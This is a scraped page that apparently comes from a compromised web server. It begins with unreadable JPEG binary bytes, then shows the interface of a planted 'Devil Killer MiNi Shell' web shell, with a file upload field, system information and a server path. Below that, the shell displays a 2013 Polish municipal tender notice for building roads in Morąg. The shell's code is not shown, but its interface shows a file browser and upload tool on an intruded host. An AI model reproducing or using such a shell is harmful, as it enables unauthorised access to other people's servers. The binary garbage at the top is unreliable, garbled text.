JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130219/67894-N-2013.html

<p class="kh_header"><b>Morąg: Budowa dróg i ulic w gminie Morąg:
Zadanie Nr 1 Budowa ulicy Mazurskiej w Morągu
Zadanie Nr 2 Budowa drogi we wsi Strużyna</b><br>
<b>Numer ogłoszenia: 67894 - 2013; data zamieszczenia: 19.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Morągu , ul. 11 Listopada 9, 14-300 Morąg, woj. warmińsko-mazurskie, tel. 089 7572231, faks 089 7572120.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.morag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa dróg i ulic w gminie Morąg:
Zadanie Nr 1 Budowa ulicy Mazurskiej w Morągu
Zadanie Nr 2 Budowa drogi we wsi Strużyna.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie Nr 1 Budowa ulicy Mazurskiej w Morągu

Przedmiotem inwestycji jest budowa ulicy (beton asfaltowy) i chodników z kostki betonowej oraz oświetlenia ulicznego.
Parametry nawierzchni:

- Podłoże G-2
- Szerokość drogi 5,5m
- Szerokość chodników 1,5 i 2,0 m
- Szerokość poboczy 1,5m
Konstrukcja nawierzchni drogi i chodnika

Droga:
- Warstwa ścieralna z betonu asfaltowego o strukturze zamkniętej 
- Skropienie emulsją asfaltową 
- Warstwa wiążąca z betonu asfaltowej o strukturze częściowo zamkniętej 
- Skropienie emulsją asfaltową 
- Górna warstwa podbudowy 
- Dolna warstwa podbudowy - Warstwa odsączająca z piasku 

Na odcinku A-C km 0+000 ÷ 0+058 oraz D-G km 0+057 ÷ 0+118.78
- Warstwa ścieralna z betonu asfaltowego o strukturze zamkniętej 
- Skropienie emulsją asfaltową 
- Warstwa wiążąca z betonu asfaltowej o strukturze częściowo zamkniętej 
- Skropienie emulsją asfaltową 
- Górna warstwa podbudowy 
- Dolna warstwa podbudowy 
- Warstwa odsączająca z piasku 
- Geokrata o małych komórkach 
- Geowłóknina 
Chodnik 

- Kostka betonowa 6 cm na warstwie wyrównawczej 
- Warstwa odsączająca z piasku 

Zjazdy
- Kostka betonowa 8 cm w kolorze czerwonym 
- Podbudowa z tłucznia kamiennego 
- Warstwa odsączająca z piasku 

Skrzyżowanie z drogą żwirową 

Na początku przebiegu projektowanej drogi po prawej stronie występuje skrzyżowanie
z drogą o nawierzchni żwirowej. Na odcinku 15 m wykonać nawierzchnię z tłucznia
kamiennego. Obramowanie wykonać z krawężnika na ławie betonowej z oporem

Odwodnienie
Właściwe odwodnienie powierzchniowe mają zapewnić spadki podłużne i poprzeczne.
Dalszy bieg wód opadowych przejmą kratki ściekowe na studniach fi 500 z osadnikiem
połączone do istniejącej sieci kanalizacji deszczowej . Odcinek A-C jest uzbrojony w sieć
kanalizacji deszczowej i odprowadzenie wód z kratek należy wykonać za pomocą
przykanalików fi 200 do istniejących studni .
Na odcinku D-G (km 0+000 - 0+076) wody z kratek ściekowych odbierze istniejąca
kanalizacja deszczowa. Pozostały odcinek ( km 0+076 - 0+117) o powierzchni 0,05ha będzie
odwodniony za pomocą kolektora fi 200 do osadnika i dalej do rowu.
W wycenie oferty należy oczywiście uwzględnić separator (opisany w dok. technicznej).

Zabezpieczenie wlotu przepustu rzeki Morążek

Na skrzyżowaniu z ulicą Mazurską występuje przepust fi1000 o rzędnej dna 111,61 n.p.m.
Wykonać zabezpieczenie głębokiego wykopu barierą ochronną stalową w kolorze żółtym z
rur fi100 i fi80 osadzonych w fundamencie żelbetowym.

Oznakowanie

Oznakowanie wykonać zgodnie z planem oznakowania ustawiając znaki na słupkach z rur
stalowych ocynkowanych fi 63mm stabilizowanych betonem w gruncie. Wysokość spodu znaku 2m ponad poziomem chodnika.

Oświetlenie uliczne

Wszystkie latarnie posadowione będą przy obrzeżu chodnika na gruntach będących we władaniu gminy Morąg.
Zasilanie zaprojektowanych obwodów oświetleniowych budowanej ulicy zaprojektowano z istniejącej szafki sterowniczej SO typu SOP-n-3 w obudowie OP 58D.
Budowę obwodów oświetleniowych nr I do III wykonać kablem ziemnym YAKY4x25,0m2 wyprowadzonym z szafki sterowniczej SO w kierunku budowanej ulicy Mazurskiej. W miejscach wskazanych w projekcie ustawić aluminiowe słupy oświetleniowe 6m montowane na prefabrykowanych fundamentach.


Szczegółowy zakres przedmiotu zamówienia opisuje dokumentacja projektowa, przedmiary robót, specyfikacja techniczna wykonania i odbioru robót budowlanych.
Zamawiający dopuszcza ujęcie w ofercie,  a następnie zastosowanie innych materiałów i urządzeń niż podane w dokumentacji projektowej i przedmiarze pod warunkiem zapewnienia parametrów nie gorszych niż określone w tej dokumentacji. W takiej sytuacji Zamawiający wymaga złożenia stosownych dokumentów, uwiarygodniających te materiały i urządzenia. Złożone wyżej wskazane dokumenty będą podlegały ocenie przez autora dokumentacji projektowej, który sporządzi stosowną opinie. Opinia ta będzie podstawą do podjęcia przez Zamawiającego decyzji o akceptacji równoważników lub odrzuceniu oferty z powodu ich nierówno ważności.
Ze względu na ograniczoną ilość środków finansowych w bieżącym roku, Zamawiający dokona płatności w roku 2013 maksymalnie na kwotę 97 000,00 zł brutto. Pozostała kwota ceny ofertowej Wykonawcy zostanie opłacona w roku 2014. 

Zadanie Nr 2 Budowa drogi we wsi Strużyna

Przedmiotem inwestycji jest wykonaniu nawierzchni drogi z masy bitumicznej na podbudowie z kamienia łamanego oraz wykonanie nowej nawierzchni na zjazdach oraz odwodnienia drogi.

Parametry projektowe

-Klasa drogi D
- Podłoże G-1
- Szerokość nawierzchni 4,0m
- Szerokość poboczy 0,5m

Zjazdy na posesje

Wszystkie istniejące zjazdy na sąsiednie posesje i na drogi zostaną utwardzone do granicy działki zachowując nawierzchnię taką samą jak nawierzchnia drogi.

Szerokość zjazdów 3,5m.
Długość do granic działek.
Spadek podłużny max. 5%.
Zjazdy obramować krawężnikiem betonowym chowanym , na ławie betonowej z betonu B15 z oporem .

Konstrukcja nawierzchni drogi i zjazdów
- Warstwa ścieralna z betonu asfaltowego o strukturze zamkniętej 
- Skropienie asfaltem D-200 
- Warstwa wiążąca z betonu asfaltowego o strukturze częściowo zamkniętej 
- Skropienie asfaltem D-200 
- Warstwa warstwa klinująca z betonu asfaltowego o strukturze częściowo
zamkniętej 
- Skropienie asfaltem D-200 w ilości 1kg/m2 podbudowy z kamienia łamanego
- Górna warstwa podbudowy 
- Dolna warstwa podbudowy 
- Warstwa odsączająca z piasku 

Roboty rozbiórkowe

Przed rozpoczęciem robót nawierzchniowych należy rozebrać istniejącą nawierzchnię
brukowcową znajdującą się pod projektowanymi powierzchniami, wywożąc materiał w miejsce wskazane przez inwestora.

Odwodnienie

Właściwe odwodnienie powierzchniowe mają zapewnić spadki podłużne i poprzeczne.
Dalszy bieg wód opadowych przejmą urządzenia odwadniające. Do odwodnienia w miejscach spływu wód zastosowano kratki ściekowe
na studniach fi 500 z odstojnikiem min. 0,5m głębokości z odprowadzeniem przykanalikiem          fi 200.
Do odbioru wody zastosowano ściek betonowy 50x60x15 na podbudowie z chudego betonu.

Oznakowanie
Znak pionowy A-7 wykonać zgodnie z planem sytuacyjnym , mocując na słupie stalowym ocynkowanych na wysokości 2m ponad poziom drogi.

Szczegółowy zakres przedmiotu zamówienia opisuje dokumentacja projektowa, przedmiary robót, specyfikacja techniczna wykonania i odbioru robót budowlanych.
Zamawiający dopuszcza ujęcie w ofercie,  a następnie zastosowanie innych materiałów i urządzeń niż podane w dokumentacji projektowej i przedmiarze pod warunkiem zapewnienia parametrów nie gorszych niż określone w tej dokumentacji. W takiej sytuacji Zamawiający wymaga złożenia stosownych dokumentów, uwiarygodniających te materiały  i urządzenia. Złożone wyżej wskazane dokumenty będą podlegały ocenie przez autora dokumentacji projektowej, który sporządzi stosowną opinie. Opinia ta będzie podstawą do podjęcia przez Zamawiającego decyzji o akceptacji równoważników lub odrzuceniu oferty z powodu ich nierówno ważności.
Ze względu na ograniczoną ilość środków finansowych w bieżącym roku, Zamawiający dokona płatności w roku 2013 maksymalnie na kwotę 97 000,00 zł brutto. Pozostała kwota ceny ofertowej Wykonawcy zostanie opłacona w roku 2014..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających stanowiących nie więcej niż  50 % wartości zamówienia podstawowego i polegających na powtórzeniu zamówień tego samego rodzaju, zgodnie z art. 67 ust. 1 pkt. 6 ustawy Prawo zamówień publicznych.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.23.16.00-1, 45.23.31.24-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Dla zadania częściowego nr 1: 10 000.00 PLN (słownie:  dziesięć  tysięcy 00/100 PLN)
Dla zadania częściowego nr 2: 10 000.00 PLN (słownie:  dziesięć  tysięcy 00/100 PLN)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Ocena spełniania warunku nastąpi na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu wymienionego w ust. 7 pkt. 7.1 Lp.1 SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia.
Wykonawcy winni udokumentować zrealizowanie:
Dla Zadania Nr 1
- co najmniej jednego zadania  polegającego na wykonaniu nawierzchni (z kostki betonowej lub mieszanki bitumicznej) o powierzchni nie mniejszej niż 1 000 m2 (nie można łączyć większej ilości zadań celem uzyskania wymaganej powierzchni)  
- co najmniej jednego zadania związanego z wykonaniem oświetlenia ulicznego  o wartości nie mniejszej jak  50 000,00 zł brutto (nie można łączyć większej ilości zadań celem uzyskania wymaganej wartości).
Dla Zadania Nr 2
- co najmniej jednego zadania  polegającego na wykonaniu nawierzchni z mieszanki bitumicznej  o powierzchni nie mniejszej niż 1 000 m2 (nie można łączyć większej ilości zadań celem uzyskania wymaganej powierzchni)  
Doświadczenie wykonawcy, powinno zostać potwierdzone dokumentami, z których wynika odpowiednio, że roboty budowlane zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone z udokumentowaniem: wykonanej powierzchni utwardzonej (ilościowo)  oraz wartości zadania wykonania oświetlenia ulicznego (kwotowo).
Wykaz robót z podaniem wartości/ilości, daty i miejsca wykonania należy wykonać wg wzoru Załącznika Nr 4.
Ocena spełniania warunku nastąpi na podstawie złożonego oświadczenia stanowiącego Załącznik nr 4 do SIWZ oraz na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu wymienionego w ust. 7 pkt. 7.1 Lp.1 SIWZ.
Do wzmiankowanego formularza (załącznik nr 4) należy dołączyć dokumenty potwierdzające, że wykazane roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Nie wykazanie w wystarczający sposób potwierdzania spełniania tego warunku spowoduje wykluczenie wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.
Jeżeli wykonawca nie może wykazać, że spełnia warunek udziału w postępowaniu, o którym mowa wyżej Zamawiający uzna, że wykonawca spełnia powyższy warunek, gdy wykaże, że polega on na wiedzy i doświadczeniu, innych podmiotów, nie zależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiać w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają w/w warunek.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania odpowiednim potencjałem technicznym. Ocena spełniania warunku nastąpi na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu wymienionego w ust. 7 pkt. 7.1 Lp.1 SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia.
Dla uznania, że wykonawca spełnia warunek dysponowania osobami zdolnymi do wykonania zamówienia, zamawiający żąda, by wykonawca wykazał:
Dla Zadania Nr 1
osobę, której zamierza powierzyć funkcję kierownika budowy do:
- do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów
osobą, której zamierza powierzyć funkcję kierownika robót do:
- do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń lub odpowiadającymi im, ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów
osobą, której zamierza powierzyć funkcję kierownika robót do:
- do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci i instalacji wodociągowych i kanalizacyjnych bez ograniczeń lub odpowiadającymi im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów

Dla Zadania Nr 2
osobę, której zamierza powierzyć funkcję kierownika budowy do:
- do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów
osobą, której zamierza powierzyć funkcję kierownika robót do:
- do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci i instalacji wodociągowych i kanalizacyjnych bez ograniczeń lub odpowiadającymi im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów

Ocena spełniania warunku nastąpi na podstawie złożonego oświadczenia stanowiącego Załącznik nr 2 do SIWZ o którym mowa w ust. 7 pkt 7.1 Lp.2 SIWZ oraz na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu wymienionego w ust. 7 pkt. 7.1 Lp.1 SIWZ a także złożonego oświadczenia o posiadaniu uprawnień przez osoby, które będą uczestniczyć w wykonywaniu zamówienia, o którym mowa w ust. 7 pkt. 7.1 Lp.3 SIWZ.
Nie wykazanie w wystarczający sposób potwierdzania spełniania tego warunku spowoduje wykluczenie wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów. Zamawiający określając wymogi dla osób w zakresie posiadanych uprawnień budowlanych dopuszcza odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej z zastrzeżeniem art. 12a oraz innych przepisów Prawo budowlane (tekst jednolity Dz. U. z 2006 r. Nr 156 poz. 1118 z późniejszymi zm.) oraz ustawy o zasadach uznania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r., Nr 63, poz. 394), wówczas wykonawca na własny koszt zapewni tłumacza języka polskiego, który zapewni stałe i biegłe tłumaczenie w kontaktach pomiędzy Zamawiającym a Wykonawcą, a także zapewni tłumaczenie na bieżąco wszystkich dokumentów związanych z realizacją przedmiotowego zamówienia stworzonych zarówno przez Wykonawcę, jak i dostarczonych przez Zamawiającego. Wykonawca zatrudniając tłumacza winien wziąć pod uwagę, iż z uwagi na złożony zakres przedmiotu zamówienia tłumacz ten winien być biegłym w tłumaczeniu zagadnień technicznych, ekonomicznych i prawnych. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają w/w warunek.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej.
Zamawiający uzna, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, jeżeli suma ubezpieczenia wynikająca z polisy lub innego dokumentu ubezpieczenia nie będzie niższa niż:
Dla Zadania Nr 1 - 300 000,00 zł
Dla Zadania Nr 2 - 300 000,00 zł
W przypadku składania oferty wspólnej ww. dokumenty składa każdy z wykonawców składających ofertę wspólną. Warunek wysokości sumy ubezpieczenia zostanie uznany przez zamawiającego za spełniony, jeżeli wykonawcy składający ofertę wspólną będą spełniać go łącznie.
Ocena spełniania warunku nastąpi na podstawie złożonego dokumentu (np. polisy) oraz oświadczenia o spełnianiu warunków udziału w postępowaniu wymienionego w ust. 7 pkt. 7.1 Lp.1 SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

